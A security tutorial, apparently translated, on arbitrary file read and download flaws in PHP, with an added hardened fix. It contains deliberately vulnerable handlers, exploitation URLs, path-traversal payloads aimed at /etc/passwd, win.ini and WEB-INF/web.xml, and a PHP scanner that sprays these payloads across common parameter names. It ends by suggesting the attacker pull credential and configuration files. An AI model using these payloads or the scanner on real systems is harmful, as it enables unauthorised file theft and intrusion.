0x01 Impact

An attacker can download or read arbitrary files from the server: script source code, system configuration files, database configuration files, API key files and so on. The downloaded source can then be audited for further vulnerabilities, and any credentials found in the files can be used directly, for example to log in over SSH or to connect to the database with the account and password from its configuration file.

0x02 Arbitrary file read: exploitation and code

0x02.1 Example one

0x02.1.1 Code

  <?php
  // Variant 1: readfile() streams the file named by the user straight into the response.
  $filename = $_GET['file'];
  readfile($filename);
  ?>

  <?php
  // Variant 2: the same flaw via fopen()/fread(); the path is still taken verbatim from the request.
  $filename = $_GET['file'];
  $fp = fopen($filename, "r") or die("Unable to open file!");
  $data = fread($fp, filesize($filename));
  fclose($fp);
  echo $data;
  ?>

  <?php
  // Variant 3: file_get_contents() reads the whole file in one call and echoes it.
  $filename = $_GET['file'];
  echo file_get_contents($filename);
  ?>

0x02.1.2 Exploitation

  Open: http://atest.test/download.php?file=./config.php

The contents of the script's own config.php come back in the response body. Nothing restricts the path, so ../ sequences reach files outside the web root in the same way.

0x02.2 Example two

0x02.2.1 Code

  <?php
  // copy() reads the user-supplied path and writes its contents to a file inside the web root.
  $filename = $_GET['file'];
  copy($filename, 'xxx.txt');
  ?>

0x02.2.2 Exploitation

  Open: http://atest.test/test.php?file=./config.php

After that request completes, copy() has written the contents of config.php into xxx.txt, which sits in the web root and can be fetched directly:

  Open: http://atest.test/xxx.txt

0x03 Arbitrary file download: exploitation and code

0x03.1 Vulnerable code

  <?php
  // Vulnerable: $filename is used unchecked both as the download name and as the file to read.
  $filename = $_GET['file'];
  header("Content-Type: application/octet-stream");
  header("Content-Disposition: attachment; filename=" . $filename);
  header("Accept-Ranges: bytes");
  header("Content-Length: " . filesize($filename)); // the original wrote "Accept-length", which is not an HTTP header
  readfile($filename);
  ?>

0x03.2 Exploitation

  Open: http://atest.test/download.php?file=./任意文件下载测试.txt

The file (its name means "arbitrary file download test") is served as an attachment. Substituting ./config.php, or a traversal payload such as the one in 0x04, downloads those files in exactly the same way.
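The fix for every handler on this page (the readfile()/fopen()/file_get_contents() variants in 0x02.1, the copy() variant in 0x02.2 and the download script above) is the same: never let the request choose a path, only a name within a fixed directory, and verify the resolved location. The following is an added example, not code from the original post; the directory /var/www/files, the extension allowlist and the use of the `file` parameter are assumptions made for the illustration.

```php
<?php
// Added example, not code from the original post: a hardened download.php
// for the handlers shown above. Assumed (hypothetical) layout: downloadable
// files live under /var/www/files and clients send a bare file name such as
// report.pdf in ?file=, never a path.
declare(strict_types=1);

const DOWNLOAD_DIR = '/var/www/files';       // assumption: the only directory we serve from
const ALLOWED_EXT  = ['txt', 'pdf', 'zip'];  // assumption: nothing executable or configuration-like

/**
 * Map a user-supplied name to an absolute path inside $baseDir, or return
 * null if the request must be refused.
 */
function resolveDownloadPath(string $baseDir, string $requested): ?string
{
    // Refuse anything that is not a bare file name: "../x", "./config.php",
    // "/etc/passwd" and NUL bytes all fail here. basename() also strips "\"
    // on Windows builds, so backslash traversal is covered. Dotfiles such as
    // .env and .htaccess are refused as well.
    if ($requested === '' || $requested !== basename($requested)
        || strpos($requested, "\0") !== false || $requested[0] === '.') {
        return null;
    }

    // Extension allowlist, so config.php and similar are never served even
    // if someone drops them into the download directory.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // realpath() resolves symlinks and "..", and returns false for missing
    // files, so the containment check is made on the real on-disk location.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }

    // Containment check: the resolved file must sit below the base directory.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

$raw  = $_GET['file'] ?? '';
$path = is_string($raw) ? resolveDownloadPath(DOWNLOAD_DIR, $raw) : null;
if ($path === null) {
    http_response_code(404);   // same answer for "bad name" and "no such file"
    exit('Not found');
}

header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
// Only the sanitised name reaches the header, so its value is not attacker-shaped.
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

The bare-name check alone already defeats the payloads on this page; the realpath() containment check is kept as a second layer so that a symlink inside the download directory pointing at /etc/passwd or at the application's config.php is refused too. If the application genuinely needs to serve files by an identifier rather than by name, the safer design is a database lookup from an ID to a stored path, with the request never carrying a file name at all.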


0x04 How to find this vulnerability

Pay attention to parameters like the following. The first line is a typical traversal payload; the rest are parameter names commonly seen in download and file-reading handlers, and each of them is worth testing with the same payload:

  download.php?path=./../etc/passwd
  down.xxx?filename=
  download.php?Path=
  download.php?path=
  download.php?RealPath=
  download.php?FilePath=
  download.php?filepath=
  download.php?inputFile=
  download.php?url=
  download.php?urls=
  download.php?dir=
  download.php?data=
  download.php?readfile=
  download.php?src=
  download.php?inputfile=
  download.php?META-INF=
  download.php?WEB-INF
  download.php?menu=
  and so on.

META-INF and WEB-INF are not parameter names but directories of Java web applications; when a download handler turns up on such a site, aim the payload at files like WEB-INF/web.xml, which holds the application's servlet configuration.
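Trying each of these names by hand is slow, so the following is an added example (not part of the original post) of a small CLI helper that sends a handful of payloads through every parameter name above and flags responses that look like a file read. The endpoint URL, the payload set, the response markers and the script name hunt.php are all assumptions made for the illustration; run it only against systems you are authorised to test.

```php
<?php
// Added example, not part of the original post: a CLI helper that tries the
// parameter names listed above against one endpoint and reports responses
// that contain a recognisable file. Assumptions (hypothetical): the endpoint
// is given on the command line, and a hit is identified by the markers below.
// Run as: php hunt.php http://atest.test/download.php
declare(strict_types=1);

// Parameter names from the list above (plus "file", used by the examples on this page).
$params = ['file', 'filename', 'path', 'Path', 'RealPath', 'FilePath', 'filepath',
           'inputFile', 'inputfile', 'url', 'urls', 'dir', 'data', 'readfile', 'src', 'menu'];

// Payloads are sent raw (no URL encoding) so that "../" and "%00" reach the
// application exactly as written.
$payloads = [
    './config.php',                      // the handler's own directory, as in 0x02
    '../../../../etc/passwd',            // traversal out of the web root
    '/etc/passwd',                       // absolute path, works when nothing is prepended
    '..\\..\\..\\..\\windows\\win.ini',  // Windows hosts
    '../WEB-INF/web.xml',                // Java web applications
    '../../../../etc/passwd%00.jpg',     // NUL truncation on legacy PHP (before 5.3.4)
];

// Response fragments that identify what came back.
$markers = [
    'root:x:0:0' => '/etc/passwd',
    '[fonts]'    => 'win.ini',
    '<web-app'   => 'web.xml',
    '<?php'      => 'PHP source',
];

/** Return the label of the first marker found in $body, or null if none matches. */
function classify(string $body, array $markers): ?string
{
    foreach ($markers as $needle => $label) {
        if (strpos($body, $needle) !== false) {
            return $label;
        }
    }
    return null;
}

if (PHP_SAPI !== 'cli' || $argc < 2) {
    fwrite(STDERR, "usage: php hunt.php http://host/download.php\n");
    exit(1);
}
$endpoint = $argv[1];
$sep      = strpos($endpoint, '?') === false ? '?' : '&';
// ignore_errors => true returns the body even on 4xx/5xx, which is where
// verbose handlers sometimes leak the path they tried to open.
$ctx = stream_context_create(['http' => ['timeout' => 5, 'ignore_errors' => true]]);

foreach ($params as $p) {
    foreach ($payloads as $pl) {
        $url  = $endpoint . $sep . $p . '=' . $pl;
        $body = @file_get_contents($url, false, $ctx);
        if ($body === false) {
            continue;   // connection error or timeout: move on
        }
        $hit = classify($body, $markers);
        if ($hit !== null) {
            echo "[+] {$url} -> {$hit}\n";
        }
    }
}
```

A hit on any line confirms the read; the next step is to pull the files named in 0x01 (application source, database and API configuration) through the same parameter and continue the audit from there.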